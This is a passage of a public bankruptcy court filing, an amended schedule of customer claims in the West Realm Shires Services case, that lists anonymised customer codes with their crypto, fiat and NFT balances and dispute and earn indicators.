| 07407605 | | USD[0.00] | | |
| 07407620 | | LINK[43.45606192], SOL[10.294], USD[0.65] | | |
| 07407623 | | TRX[2202.156] | | |
| 07407628 | Contingent, Disputed | BAT[1], BRZ[0.00015382], BTC[.00323514], USD[48.66] | | |
| 07407634 | | SOL[0] | | |
| 07407636 | | SOL[0] | | |
| 07407637 | | BAT[14.17369880], BRZ[2], CUSDT[5], DOGE[309.37699393], GRT[458.25236082], KSHIB[783.81366279], MKR[.05785174], NFT [459474994282556138/Solana Squirrel #542][1], PAXG[.08816768], SGD[0.00], SOL[0.93313424], SUSHI[22.54542586], TRX[5], USD[0.00] | Yes | |
| 07407638 | | BCH[.50234429], BRZ[1], BTC[.02048995], CUSDT[8], DOGE[1402.42678324], ETH[.67291855], ETHW[.67291855], LINK[8.94065434], SHIB[2999850.00749962], SOL[30.10201602], SUSHI[7.03966724], TRX[1], USD[0.01] | | |
| 07407639 | | CUSDT[4], DOGE[1], GRT[64.26204755], LINK[2.03993644], USD[0.00] | | |
| 07407641 | | BTC[.00785995], CUSDT[9], DOGE[3381.14973493], ETH[.13856078], ETHW[.13856078], LTC[.21516993], SOL[1.92848765], TRX[1724.96947701], UNI[2.1894189], USD[0.01] | | |
| 07407646 | | BAT[0], BCH[0], BTC[0], DOGE[0], ETH[7.33564101], ETHW[1.01000000], LINK[0], SOL[0.00900000], TRX[0], UNI[0], USD[35.55], USDT[0.64805888] | | |
| 07407647 | | BTC[.0256743], DOGE[3217.77900000], ETH[0], LINK[53.4465], SOL[0], USD[69.75], WBTC[0] | | |
| 07407650 | | BTC[.00003615], LINK[.0385], USD[0.00] | | |
| 07407652 | | USD[100.00] | | |
| 07407656 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07407660 | | BTC[0.00006626], DOGE[0.08226408], LTC[.00423], SOL[0], USD[1.10], USDT[1.22161050], YFI[.000988] | | |
| 07407663 | | CUSDT[1], DOGE[1], USD[19.80], USDT[0] | | |
| 07407665 | | AVAX[.01285655], BTC[.00002592], ETH[.00000001], ETHW[0], NFT (566261244738639310/Sailing in the Red Sea )[1], SOL[0], USD[95.44], USDT[0] | | |
| 07407666 | | BRZ[0.00000351], BTC[0.00000001], DOGE[2.00000001], ETH[0.00013201], ETHW[.00013201], MATIC[0], PAXG[.0001], USD[0.51] | | |
| 07407667 | | BTC[.00478127], DOGE[1], USD[0.00] | Yes | |
| 07407673 | | BTC[0.00002161], SOL[0.25539015], USD[2.36] | | |
| 07407674 | | USD[0.01], USDT[0] | | |
| 07407676 | | ETH[.0025796], ETHW[.0025796], SLC[.04199632], USD[3.58] | | |
| 07407678 | | ETH[41.9701676], ETHW[41.9701676], TRX[.585], USD[380.17], USDT[.0618558] | | |
| 07407681 | | SOL[0] | | |
| 07407683 | | BTC[0.00005539], DAI[.09577], ETHW[.087], USD[0.00], USDT[.00251192] | | |
| 07407685 | | BTC[0], LINK[.069], SOL[.0018] | | |
| 07407688 | | BRZ[1], BTC[0.10938982], DOGE[0], SHIB[3], SOL[0], TRX[0], USD[1252.46], USDT[0] | Yes | |
| 07407689 | | TRX[1], USD[0.00] | | |
| 07407691 | | CUSDT[1], DAI[3.0154632], DOGE[164.15568189], KSHIB[88.65273376], LINK[1.00295507], SHIB[888888.88888888], SOL[1.00001869], TRX[1], USD[5.00], USDT[3.00401085] | | |
| 07407693 | | ETH[.00004303], ETHW[.00004303], USD[0.00] | | |
| 07407696 | | BTC[0], MATIC[5.17580197] | | |
| 07407705 | | DOGE[0], SHIB[0], USD[0.01] | | |
| 07407706 | | BTC[.00002054], DOGE[149.85], SOL[0], USDT[0] | | |
| 07407708 | | SOL[.01386663], USD[0.00] | | |
| 07407709 | | DOGE[3], SOL[.09466818], TRX[1], USD[8.45] | | |
| 07407711 | | DOGE[2], USD[0.98] | | |
| 07407712 | | BAT[1.01065231], BTC[.00000149], CUSDT[5], DOGE[2], ETHW[4.28738316], LINK[0.00010845], MATIC[.00046293], SHIB[83.48959373], SOL[.00011474], SUSHI[.00009065], TRX[.01129919], USD[0.00] | Yes | |
| 07407725 | | USD[4.52] | | |
| 07407726 | | DOGE[2931.48436639], USD[5.22] | Yes | |
| 07407727 | | USD[10.52] | | |
| 07407736 | | CUSDT[2], DOGE[0], USD[0.01], USDT[0] | | |
| 07407737 | | DOGE[0], GRT[0], LTC[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], USD[0.03], USDT[0] | Yes | |
| 07407739 | | BTC[0] | | |
| 07407740 | | UNI[.0605], USD[0.16] | | |
| 07407742 | | BCH[.0000848], USDT[1.465365] | | |
| 07407743 | | CUSDT[2], DOGE[106.3514351], TRX[36.01936075], USD[0.00] | Yes | |
| 07407745 | | BTC[.0001422], CUSDT[1466.60169462], DOGE[20.17429356], LTC[.0374412], USD[2.00] | | |
| 07407746 | | USD[0.25], USDT[0] | Yes | |
| 07407748 | | NFT (484690790525692582/Saudi Arabia Ticket Stub #2232)[1], USD[0.00] | | |
| 07407753 | | USD[4.51] | | |
| 07407755 | | BTC[0], USD[4.67] | | |
| 07407756 | | SOL[.01909558], USD[0.11] | | |
| 07407771 | | BRZ[1], CUSDT[1], DOGE[2], USD[0.00] | Yes | |
| 07407772 | | DOGE[1], USD[0.00] | | |
| 07407774 | | BTC[.00077041], CUSDT[2], DOGE[1], ETH[.02286469], ETHW[.0225772], TRX[1], USD[0.00] | Yes | |
| 07407777 | | USD[0.00], USDT[109.55597536] | Yes | |
| 07407778 | | BTC[0], SOL[0], USD[0.36] | | |
| 07407786 | | ETHW[2.00083375], NFT (424861396802041670/4682)[1], NFT (500797474579399886/2201)[1], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000124] | | |
| 07407792 | | CUSDT[2], DOGE[1], TRX[1], USD[0.01] | Yes | |
| 07407794 | | BAT[1], BRZ[1], CUSDT[3], DOGE[3], GRT[1], LINK[1], TRX[4], UNI[1], USD[0.00], USDT[0] | | |
| 07407795 | | BAT[0], BTC[0], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07407802 | | BTC[0.00007939], DAI[0], ETH[0], SOL[0.00000001], TRX[.000002], USD[0.66], USDT[0.00215720], WBTC[0] | | |
| 07407806 | | USD[0.00] | | |
| 07407808 | | BF_POINT[200], USD[98.61] | | |
| 07407809 | | BAT[1.0165555], BRZ[4], CUSDT[4], GRT[2.07109035], LTC[.00000916], SUSHI[2.21044115], TRX[3], USD[0.01], USDT[2.21044115] | Yes | |
| 07407812 | | USD[0.00] | | |
| 07407815 | | BTC[0], ETH[0], LTC[0], SOL[.00000001], TRX[0], USD[0.00] | | |
| 07407816 | | ETH[.00000001], USD[0.89], USDT[0] | | |
| 07407817 | | BAT[0], BTC[0], SOL[0], SUSHI[0], USD[32983.01], USDT[0] | Yes | |
| 07407818 | | USD[6.47], USDT[0.00000001] | | |
| 07407819 | | USD[0.00], USDT[0.00056753] | | |
| 07407821 | | ETH[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07407825 | | SOL[270.98586391], USD[67.97] | | |
| 07407827 | Contingent, Disputed | BTC[0], USD[0.00], USDT[0] | | |
| 07407828 | | BTC[0], ETH[.00000001], SOL[0.04734728], TRX[.5], USD[0.19] | | |
| 07407829 | | BTC[0], USD[0.00], USDT[3.21933808] | | |
| 07407832 | | LINK[.00000001], SOL[.00007713] | Yes | |
| 07407833 | | ETH[.00032253], ETHW[0.00032252], SOL[77.19120773], TRX[700.97413575], USD[14.85] | | |
| 07407834 | | SOL[.0673] | | |
| 07407839 | | BTC[0], ETH[.686], ETHW[.686], USD[17.84], USDT[0], WBTC[0] | | |
| 07407843 | Contingent, Disputed | BAT[4.29023339], BF_POINT[200], BRZ[1.47364427], CUSDT[24], DOGE[17.39905118], ETH[0], GRT[2.00498957], LTC[0], SHIB[7], SOL[8.33652396], TRX[13.29150347], USD[12.00], USDT[3.27502904] | Yes | |
| 07407844 | | BTC[.0257679], SOL[123.79003], USD[13.65] | | |
| 07407847 | | AAVE[0], AVAX[0], BTC[0], DAI[0], DOGE[0], ETH[0], ETHW[0.00104147], LINK[0], MATIC[0], PAXG[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00000463], WBTC[0] | | |
| 07407848 | | SOL[0.00361994], USDT[0] | | |
| 07407851 | | SUSHI[.00000001], USDT[0.00000069] | | |
| 07407853 | | ETH[0], USD[0.00] | | |
| 07407858 | | BTC[0.21392590], SOL[.036] | | |
| 07407863 | | ETH[0], SOL[0], USD[0.01], USDT[0] | Yes | |
| 07407864 | | USD[6339.54], USDT[0] | Yes | |
| 07407865 | | SOL[0], TRX[.188], USD[0.57], USDT[0.00838404] | | |
| 07407870 | | ETH[0], ETHW[0], SOL[0], USD[0.00] | | |
| 07407873 | | BRZ[1], DOGE[1], SHIB[1], USD[0.00] | | |
| 07407875 | | BTC[.00153164], ETH[.45559194], ETHW[.45559194] | | |
| 07407879 | | BTC[0.18156039], ETH[0], LINK[0], USD[0.00] | | |
| 07407883 | | SOL[.0025], SUSHI[50.949], USD[0.00] | | |
| 07407884 | | SOL[67.62087871] | | |
| 07407885 | | DOGE[0], USD[9.67] | | |
| 07407887 | | TRX[.000002] | | |
| 07407892 | | USD[5.00] | | |
| 07407896 | | DOGE[1445.553], USD[1.14] | | |
| 07407902 | | NFT [436430348871380551/The DogeFather ][1], USD[0.64], USDT[0.00000001] | | |
| 07407906 | | SOL[16.56275185], USD[499.00] | | |
| 07407908 | | BAT[0], BTC[0], DOGE[0], SHIB[726739.55615401], SUSHI[7.94746975], USD[0.00] | Yes | |
| 07407909 | | ETH[0], SOL[0] | | |
| 07407910 | Contingent, Disputed | BAT[0], BTC[0], DAI[0], DOGE[0], ETH[0], KSHIB[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000482] | | |
| 07407912 | | CUSDT[2], DOGE[3383.68156948], ETH[0.03758009], ETHW[0.03711497], SHIB[2], USD[0.00], USDT[0] | Yes | |
| 07407915 | Contingent, Disputed | BTC[.00108036], DOGE[1], TRX[1], USD[0.74] | | |
| 07407921 | | USD[2.28] | | |
| 07407922 | | BRZ[1], BTC[.00051531], DOGE[725.11362676], ETH[.00671377], ETHW[.00663163], TRX[1], USD[0.00] | Yes | |
| 07407923 | | BRZ[1], CUSDT[5], SOL[7.67927329], TRX[1181.98832819], USD[0.04] | Yes | |
| 07407927 | | BTC[.00534029], CUSDT[12], DOGE[4], LTC[.00000354], NFT [314751293365504081/CryptoManchos #10][1], NFT [317593526834294361/Moon #1 of 3][1], NFT [383495629114128820/ISO 3D Series #1 #4][1], NFT [406982109513628586/Wheel of ...#1 of 3][1], NFT [470231454249979540/Reach for the sky..][1], SHIB[2], SOL[0.52048592], TRX[1], USD[0.00] | Yes | |
| 07407928 | | CUSDT[3544.68507703], DOGE[2], USD[2.21] | | |
| 07407929 | | SOL[106.143585], USD[0.95] | | |
| 07407931 | | BRZ[1], CUSDT[4], DOGE[0.00000055], ETH[0], SOL[0.00003960], TRX[2], USD[0.00], USDT[1] | | |
| 07407932 | | BAT[4], CUSDT[3], DOGE[4], SHIB[1496111.11370436], SOL[2], TRX[4], USD[0.00], USDT[6] | | |
| 07407934 | | CUSDT[1], DOGE[1382.20559054], USD[0.00] | | |
| 07407938 | | LTC[.00993388] | Yes | |
| 07407939 | | DOGE[651.35807634], ETH[.04948432], SHIB[847944.03648389], TRX[1], USD[746.06] | Yes | |
| 07407940 | | USD[0.00] | | |
| 07407955 | | LINK[.0572], USD[7.13] | | |
| 07407956 | | TRX[15] | | |
| 07407957 | | ETH[0.00210941], ETHW[0.00210941], SOL[0], USD[0.00] | | |
| 07407958 | | USD[0.00] | | |
| 07407961 | | BTC[.04981], SOL[173.7777], TRX[31861.378], USD[1011.11] | | |
| 07407967 | | BRZ[.728], BTC[0.00022399], DOGE[0.92295948], SOL[53.19403825], TRX[1.285], USD[0.08], USDT[1.39732650] | | |
| 07407968 | | AAVE[.00000001], BF_POINT[400], BRZ[1], CUSDT[1], NFT [327193125246082564/Barcelona Ticket Stub #1368][1], NFT [487714348308856242/Australia Ticket Stub #740][1], SHIB[14], SOL[0], USD[0.00] | Yes | |
| 07407973 | | BTC[0.00000001], SOL[0] | | |
| 07407979 | | USD[0.00], USDT[0] | | |
| 07407985 | | BTC[0.00023686], SOL[68.931] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07407989 | | BRZ[1], DOGE[4], ETH[.21173121], ETHW[.21173121], SOL[41.57188962], SUSHI[17.28349967], TRX[1], USD[0.00] | | |
| 07407990 | | BTC[.00017567], SOL[0], USDT[.1381958] | | |
| 07407991 | | BAT[32.77499485], BCH[.07565459], BTC[.38552146], DOGE[74079.1532588], ETH[1.41806034], ETHW[1.38526690], GRT[60.24662731], LTC[1.91941388], SHIB[52782450.85130078], SOL[2.51447712], TRX[396.11784998], UNI[2.52850079], USD[0.00], USDT[0] | | |
| 07407992 | | DOGE[2], TRX[1.92598483], USD[0.00] | Yes | |
| 07407993 | | BTC[.00009641], DOGE[1], USD[0.00] | | |
| 07407994 | Contingent, Disputed | BTC[0], GRT[1], LINK[303.4617906], SOL[644.58491687], USD[0.38] | | |
| 07407995 | | SOL[50.66], USD[8.21] | | |
| 07407999 | | TRX[.28], USD[4.17], USDT[0] | | |
| 07408001 | | DAI[.00764775], PAXG[0], USD[0.00] | | |
| 07408005 | | BTC[0], SOL[0], USD[663.27] | | |
| 07408008 | Contingent, Disputed | BRZ[1], CUSDT[1], DOGE[3], TRX[2], USD[0.00] | | |
| 07408009 | | BTC[.00237799], ETH[.03996276], ETHW[.03947028], SOL[.13660291], USD[0.00] | Yes | |
| 07408012 | | BRZ[2], DOGE[1], GRT[299.36206901], MATIC[161.32005987], SHIB[8213.67282999], TRX[7], USD[0.00], USDT[0] | | |
| 07408018 | | BAT[1], TRX[7], USD[0.01], USDT[0] | | |
| 07408020 | | DOGE[0], ETH[0], TRX[1], USD[0.01], USDT[0] | | |
| 07408027 | | CUSDT[1], DOGE[1], TRX[130.885396], USD[0.00] | | |
| 07408029 | | BTC[.00184159], CUSDT[1], DOGE[1866.54157282], ETH[.03973852], ETHW[.03973852], USD[0.00] | | |
| 07408034 | | SOL[9.96], USD[16.18] | | |
| 07408036 | | NFT (333424045866253165/StarAtlas)[1], NFT (369096239772350966/Fox #7747)[1], NFT (378040248089737928/StarAtlas)[1], NFT (400518324026851257/SOLYETIS #7975)[1], NFT (405204146108346597/StarAtlas)[1], NFT (419323878915262446/Famous Fox Crystal)[1], NFT (425676001039107900/StarAtlas)[1], NFT (471621465354715622/StarAtlas)[1], NFT (491508303191852579/StarAtlas)[1], NFT (536091750016009982/StarAtlas Anniversary)[1], NFT (559925584741870350/Royal Key)[1], SOL[6.01947696], TRX[1], USD[0.00] | | |
| 07408037 | | CUSDT[9], TRX[3], USD[0.01] | | |
| 07408042 | | BAT[0], DOGE[0], TRX[0], USD[0.01], USDT[0] | | |
| 07408043 | | DOGE[2], TRX[4958.33859473], USD[0.00] | | |
| 07408046 | | CUSDT[1], DOGE[5701.25364149], TRX[1], USD[0.56], USDT[0.00000637] | | |
| 07408048 | | BTC[.00011478], DOGE[95.90957798], SHIB[1681963.55162965], TRX[308.26469017], USD[8.41] | | |
| 07408056 | | SOL[60.69463701], USD[0.00] | | |
| 07408059 | | DOGE[53.946], SOL[30.554], USD[0.25] | | |
| 07408063 | | CUSDT[2], DOGE[245.45855949], TRX[4], USD[0.00] | | |
| 07408066 | | CUSDT[2], USD[0.01], USDT[1] | | |
| 07408068 | | BTC[0.00009934], ETH[.000609], ETHW[.000609], LTC[.00577], SOL[.00357728], SUSHI[.4698], USD[1.39], USDT[0] | | |
| 07408070 | | BRZ[1], CUSDT[2], TRX[2], USD[99.52] | | |
| 07408080 | | BAT[1], BRZ[2], CUSDT[0], DOGE[0.97276774], SHIB[3], TRX[4.01803829], USD[39.08], USDT[0.00091145] | Yes | |
| 07408082 | | USD[0.00] | | |
| 07408084 | | DOGE[1], USD[0.00] | | |
| 07408095 | | DOGE[45651.34538032], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[0], USD[3678.08], USDT[0] | | |
| 07408096 | | BRZ[3], CUSDT[12], DAI[0], DOGE[12], TRX[6], USD[0.00], USDT[1] | | |
| 07408101 | | LTC[0], SOL[0.00494727], USD[0.00] | | |
| 07408102 | | BTC[0], ETH[.00001364], ETHW[0], GRT[0], LINK[0], MATIC[.00640461], SHIB[15], SOL[0], SUSHI[.00012385], USD[0.00], USDT[0.00000001] | Yes | |
| 07408103 | | BTC[0.00000224], ETH[2.48004838], ETHW[.00444], USD[6.62] | | |
| 07408108 | | CUSDT[1], DOGE[1], ETH[.34378751], ETHW[.34378751], MATIC[622.32562465], TRX[1], USD[0.00] | | |
| 07408110 | | NFT (407628808525663196/Ferris From Afar #802)[1], USD[40.00] | | |
| 07408112 | | ETH[0], USD[0.00], USDT[0] | Yes | |
| 07408114 | | CUSDT[1], DOGE[.00747393], USD[0.00] | | |
| 07408117 | | SUSHI[.34373548], USD[0.19] | | |
| 07408118 | | USD[2.78], USDT[10.76353118] | | |
| 07408119 | | BRZ[1], CUSDT[2], DOGE[5], USD[0.00] | | |
| 07408120 | Contingent, Disputed | ETH[0], GRT[0], SOL[0], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07408122 | | BTC[0], DOGE[0], ETH[0], SHIB[0], SOL[0.00080839], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07408124 | | BRZ[1], CUSDT[1], TRX[1], USD[0.01] | | |
| 07408136 | | SOL[.00706529], USD[10.78], USDT[1.08502925] | Yes | |
| 07408139 | | MKR[0], NFT (378355561965695691/Gangster Gorillas #7793)[1], NFT (427868085546569798/2974 Floyd Norman - CLE 3-0197)[1], SHIB[29026.95569734], SOL[.24539252], TRX[1], USD[0.00] | | |
| 07408140 | | BTC[0.00000001], DAI[.00000001], PAXG[0], SOL[0], USD[0.00], USDT[0] | | |
| 07408146 | | BTC[0.00872219], ETH[.00177355], ETHW[.00177355], USD[5483.67] | | |
| 07408150 | | BTC[.00092178], TRX[1], USD[0.00] | | |
| 07408151 | | ETH[.27430604], ETHW[.27430604], USD[0.00] | | |
| 07408159 | | CUSDT[1], DOGE[1], LTC[.0009842], SOL[0], USDT[0.00000015] | Yes | |
| 07408161 | | USD[0.01] | | |
| 07408163 | | BF_POINT[300], SOL[.00000001], USD[2681.73], USDT[0.00000001] | Yes | |

West Realm Shires Services Inc.

Case 22-11068-JTD    Doc 1752    Amended Schedule F752 Nonpriority Unsecured Customer Claims    Filed 06/27/23    Page 1179 of 1316    22-11071 (JTD)

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07408165 | | BRZ[1], SOL[.11115505], USD[2.79] | | |
| 07408168 | | DOGE[.0138617], USD[0.00] | | |
| 07408169 | | USD[0.00] | | |
| 07408170 | | USD[0.00], USDT[0] | | |
| 07408173 | | CUSDT[1], DOGE[573.46908091], USD[0.00] | | |
| 07408177 | | USD[0.12] | | |
| 07408183 | | BRZ[1], BTC[.00050182], DOGE[1], ETH[.21492903], ETHW[.21471147], TRX[2], USD[7.25], USDT[106.56219644] | Yes | |
| 07408186 | | BRZ[2], CUSDT[5], TRX[3], USD[0.01] | Yes | |
| 07408195 | | DOGE[1], USD[0.00] | | |
| 07408203 | | BTC[0.00008626], SOL[.2] | | |
| 07408207 | | BCH[.01829212], CUSDT[5], DOGE[42.80524863], ETH[.05990211], ETHW[.05990211], LINK[5.62060082], LTC[1.42671882], SOL[3.59997320], TRX[157.44560589], USD[0.00] | | |
| 07408210 | | BRZ[1.76741496], CUSDT[2], SHIB[677072.98890434], USD[0.00] | Yes | |
| 07408215 | | BTC[.0034344], ETH[.04912949], ETHW[.04912949], USD[0.00] | | |
| 07408218 | | BTC[.003] | | |
| 07408220 | | USD[0.00] | | |
| 07408234 | | BAT[1.0165555], SGD[0.00], USD[0.02] | Yes | |
| 07408236 | | BAT[4.18499702], BCH[.03154464], BRZ[10.83609053], BTC[.00027288], CUSDT[198.40686132], DAI[2.97865765], DOGE[159.19655129], ETH[.00498864], ETHW[.0498864], GRT[3.37522566], LINK[.2697518], LTC[.91937907], PAXG[.00068955], SOL[.98576976], SUSHI[1.03318631], TRX[39.8074508], UNI[.1804644], USD[0.00], USDT[9.94496797] | | |
| 07408238 | | DOGE[0], USD[0.05] | | |
| 07408242 | | BRZ[1], CUSDT[8], DOGE[0], ETH[0], ETHW[0], SOL[0], TRX[2], USD[0.01] | Yes | |
| 07408246 | | DOGE[8], ETH[0], UNI[0], USD[0.00] | | |
| 07408247 | | USD[0.00], USDT[0] | | |
| 07408254 | | ETH[.00077766], ETHW[0.00077766], USD[0.00], USDT[0] | | |
| 07408258 | | DOGE[.0000314], USD[0.00] | Yes | |
| 07408261 | | CUSDT[11], TRX[1], USD[0.00] | Yes | |
| 07408269 | | BTC[.00026203] | | |
| 07408270 | | BTC[0], USD[0.00] | | |
| 07408275 | | TRX[459.33696546], USD[0.37] | | |
| 07408276 | | BTC[.00000156], CUSDT[5], USD[0.08] | Yes | |
| 07408289 | | CUSDT[1], DOGE[76.87291318], TRX[1], USD[0.00] | Yes | |
| 07408292 | | BAT[1.00658921], DOGE[1], ETH[0], LINK[1.06758273], TRX[1], USD[0.00], USDT[1.07427248] | Yes | |
| 07408305 | | BAT[2], BRZ[4], CUSDT[12], DOGE[13.62342107], ETH[0], ETHW[0.38556942], GRT[2], SOL[0], TRX[7], USD[0.00] | | |
| 07408317 | | GRT[1], USD[0.00] | | |
| 07408321 | | BTC[0.00006361], ETH[.00007058], LTC[.00184], SOL[.54] | | |
| 07408323 | | CUSDT[2], SHIB[2], TRX[1], USD[0.01] | Yes | |
| 07408327 | | CUSDT[1], DOGE[0], SOL[0], TRX[2] | | |
| 07408331 | | AAVE[0], BTC[0], CUSDT[0], ETH[0], GRT[0], KSHIB[0], LINK[0], MATIC[0], MKR[0], SOL[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07408333 | | ETH[.000284], ETHW[.000284], MATIC[3919.778], USD[7708.18], USDT[.85374075] | | |
| 07408336 | | CUSDT[1], DOGE[45.57356348], UNI[0], USD[0.04] | Yes | |
| 07408343 | | BAT[28.90873535], CUSDT[2], DOGE[3], USD[0.91] | | |
| 07408351 | | USD[118.67] | | |
| 07408364 | | BTC[.00047542], ETH[1.0589037], ETHW[1.0589037], LINK[0], USDT[0.87525322] | | |
| 07408365 | | BTC[0], CUSDT[1], DOGE[3], PAXG[.00000044], SOL[0], TRX[1], USD[0.00] | | |
| 07408367 | | CUSDT[3], DOGE[1382.06291996], ETH[.00017423], ETHW[.00017423], SHIB[17129817.47172764], TRX[3], USD[5.85] | | |
| 07408368 | | USD[0.00] | | |
| 07408371 | Contingent, Disputed | TRX[0], USDT[0] | | |
| 07408372 | | BAT[2], BF_POINT[200], DOGE[12.04514777], ETH[0], SOL[0], USD[833.52], USDT[0.00000001] | Yes | |
| 07408374 | | ETH[.00000001], ETHW[0], USD[0.00], USDT[0.00000030] | | |
| 07408375 | | ETH[0], SOL[0], USD[0.00], USDT[3.67446128] | | |
| 07408376 | | USD[4.49] | | |
| 07408378 | | BTC[0], SOL[0], UNI[.66142208], USD[0.00], USDT[0] | | |
| 07408380 | | CUSDT[4], DOGE[2], GRT[0], SOL[0.68823497], TRX[1], USD[0.00], USDT[0.00000007] | | |
| 07408382 | | BTC[.37430982], DOGE[9842.22642522], GRT[1.00300152], TRX[2], USD[7815.80] | Yes | |
| 07408383 | | BTC[.00004741], TRX[.156], USD[0.02] | | |
| 07408385 | | BTC[0], USD[0.31] | | |
| 07408390 | | BTC[.00014144], NFT (3760797433694767017FTX - Off The Grid Miami #315)[1], NFT (483783673579347559/Birthday Cake #2012)[1], NFT (54049548818228537/The 2974 Collection #1340)[1], SOL[.00009], TRX[.000004], USD[0.48], USDT[0.00000010] | | |
| 07408391 | | CUSDT[50.95036266], USD[0.01] | | |
| 07408392 | | SOL[0] | | |
| 07408393 | | CUSDT[1], SHIB[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07408399 | | BTC[.00001194], USD[0.00] | Yes | |
| 07408402 | | SOL[0], USD[0.00] | | |
| 07408403 | | BRZ[1], BTC[.014507], CUSDT[3], DOGE[1239.02016037], SHIB[381639.23298431], USD[313.10] | | |
| 07408405 | | BAT[1], CUSDT[2], DOGE[1], ETH[.00000453], ETHW[.49594794], LINK[6.94147698], TRX[2], USD[0.00] | Yes | |
| 07408409 | | USD[0.71], USDT[1.28342215] | | |
| 07408416 | Contingent, Disputed | CUSDT[0], USD[0.00], USDT[0] | Yes | |
| 07408418 | | BRZ[1], BTC[.0031487], CUSDT[2], DOGE[17.01753393], ETH[.00000805], ETHW[.00000805], GRT[5], SHIB[28960.09080325], SOL[3.45031238], TRX[1], USD[0.00], USDT[0] | | |
| 07408419 | | BTC[0], SOL[0], USD[0.00] | | |
| 07408421 | | USD[0.00], USDT[.00091168] | Yes | |
| 07408425 | | BRZ[1], CUSDT[2], DOGE[2], TRX[2], USD[0.01] | | |
| 07408427 | | BAT[2.08677881], BRZ[1], CUSDT[1], DOGE[3], GRT[2.0526927], TRX[2], USD[0.01], USDT[1.04338919] | | |
| 07408429 | | DOGE[1], SOL[0], TRX[0], USD[0.00], USDT[1.10405065] | Yes | |
| 07408433 | | USD[0.01], USDT[0] | | |
| 07408435 | | ETH[0], ETHW[0.00028300], USD[0.00], USDT[0] | | |
| 07408436 | | SOL[0] | | |
| 07408439 | | BTC[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000016] | | |
| 07408442 | | DOGE[2.37147067], USD[4.42] | | |
| 07408444 | | GRT[641], NFT [57448733608687528/Metaverse Masks #15][1], SHIB[35765347], SOL[0], USD[1.77] | Yes | |
| 07408445 | | BAT[1.01059822], BRZ[1], DOGE[3], GRT[2.00233453], SHIB[1], TRX[1], USD[0.00], USDT[2.10761096] | Yes | |
| 07408446 | | USD[3.00] | | |
| 07408454 | Contingent, Disputed | BTC[.02356165], SHIB[2], TRX[1], USD[0.00], USDT[0] | | |
| 07408455 | | BRZ[2], CUSDT[2], USD[0.01] | | |
| 07408456 | | BAT[1.0122058], BRZ[1], BTC[0], CUSDT[2], DOGE[.00002512], ETHW[2.81234974], GRT[2.0262794], SOL[.00072564], TRX[4], USD[0.00] | Yes | |
| 07408457 | | BTC[.03026843], TRX[1], USD[0.00] | | |
| 07408463 | | BTC[.00039962], DOGE[2639.93], ETH[.74814905], ETHW[.74814905], SOL[225.9946425], SUSHI[24.905], UNI[19.22666], USD[4.11] | | |
| 07408464 | | USD[542.42] | Yes | |
| 07408479 | | CUSDT[1], DOGE[.47685338], TRX[3], USD[0.94] | Yes | |
| 07408486 | | BRZ[1], BTC[.06882647], SHIB[2], USD[219.22], USDT[0] | | |
| 07408490 | | SOL[0], USD[0.00] | | |
| 07408500 | | BRZ[1], CUSDT[1], DOGE[1], NFT [566446537658629826/Entrance Voucher #2856][1], SOL[0], TRX[1], USD[0.00] | | |
| 07408503 | | BRZ[1], DOGE[2], TRX[0], USD[0.00], USDT[0.21348890] | | |
| 07408504 | | BRZ[1], CUSDT[79.73329519], GRT[1.00367791], USD[0.00], USDT[1.09193783] | Yes | |
| 07408511 | | BRZ[0], CUSDT[3], ETH[0], ETHW[0], LINK[0], TRX[6], USD[0.00] | | |
| 07408512 | | BTC[0.30397580], ETH[.0005946], ETHW[.0005946], SOL[.00446], USD[164.02], USDT[13.6792827] | | |
| 07408518 | | ETHW[.00017419], LTC[0], SHIB[45500], SOL[0], USD[241.33], USDT[0] | | |
| 07408519 | | BAT[0], BTC[0], SHIB[3], USD[0.00] | Yes | |
| 07408521 | | BAT[1.01655549], BRZ[2], CUSDT[3], DOGE[1.02414915], SHIB[40248.64632537], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07408522 | | USD[0.00] | | |
| 07408524 | | BRZ[2], CUSDT[8], DOGE[5742.26801909], SHIB[3], SOL[.0000533], USD[0.73] | Yes | |
| 07408526 | | USD[0.01] | | |
| 07408532 | | TRX[.000002] | | |
| 07408534 | | SOL[8.33534306], USD[0.00], USDT[.90933865] | | |
| 07408540 | | BTC[0.02501633], DOGE[14.943], ETH[.1163388], ETHW[.1163388], GRT[74.74065], SOL[20.725021], SUSHI[44.886], UNI[.062], USD[1.67] | | |
| 07408543 | | BRZ[1], CUSDT[1], DOGE[4553.05115678], LINK[.00066281], TRX[.00004932], USD[0.33] | Yes | |
| 07408544 | | SOL[75], SUSHI[.498], USD[0.02] | | |
| 07408545 | | CUSDT[1], DOGE[2], USD[0.00] | Yes | |
| 07408548 | | BAT[1], BRZ[4], CUSDT[9], ETH[0], TRX[4], USD[0.00] | | |
| 07408550 | | BTC[.0001714], USD[9.06] | | |
| 07408552 | | BTC[-0.00012532], ETH[.00249179], ETHW[0.00249179], SOL[0.00000001], SUSHI[2], USD[0.01], USDT[0] | | |
